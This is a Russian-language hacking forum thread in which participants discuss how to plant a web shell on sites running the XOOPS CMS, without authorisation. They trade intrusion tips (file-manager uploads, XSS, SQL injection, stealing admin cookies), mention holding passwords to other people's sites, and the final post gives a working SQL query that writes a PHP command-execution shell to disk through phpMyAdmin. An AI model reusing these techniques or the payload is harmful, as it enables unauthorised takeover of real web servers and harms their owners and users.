шелл через xoops
 

вообщем, кто подкажет как залить шелл через xoops?
я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?

в мемберки была тема про хупс! там его как нех ломали!

Я выкладывал вроде пару шеллов на xoops. Где то ещё пассы на пару сайтов валяются. В общем там всё время подключены разные модули. Ни одного одинакового сайта пока не видел. Я заливал с подключеным файл-менеджером, а без менеджера пока руки не дошли, собственно и не пробовал сильно. Эт, скинь линк и пас в личку, придумаем может что-нибудь.
Tut odin iz nix, moget pomoget http://forum.antichat.ru/showthread.php?p=75562

new_bb стоит? если да то там хсс должна быть
sql-inj на safety-lab.com посмотри
я через форум ломал щас хупс вроде как Run CMs все также осталось там
в админку без пароля только куки украсть
----------
2азазель ето где *.php.ns ты так делал?
ето некатит уже
а вообще больше всего уязвимостей на их форуме
они постоянно там выкладывабт как их сломали логи и т.д. чтобы админы заплатки сделали

Я ж грю. В админке сайта был какой то дурацкий файловый менеджер через который можно было закачивать файлы только в одну папку, типа site.com/xoops/eta/dalekaya/papka/blablabla/tatata/shell.php Я ещё заколебался её искать. Потом я нашёл ещё штук пять таких xopsoв, но админки были одна не похожа на другую и менеджера такого я больше не видел. И форумы тоже там разные были прилеплены.

столкнулся с этой проблемой(, мож её уже решили, как можно залить шелл из админки.

Если, кто решил эту проблему (залить shell из админки xoops ) отпишитесь плиз...

идешь в phpmyadmin по стандарту рут
и ебашишь sql запросов вот эту хню
SELECT '<? system("$_GET[cmd]"); ?>' FROM mysql.user INTO OUTFILE 'дира до файла'

или можешь залить полноценный шелл тока замени ' на " во всем сшеле...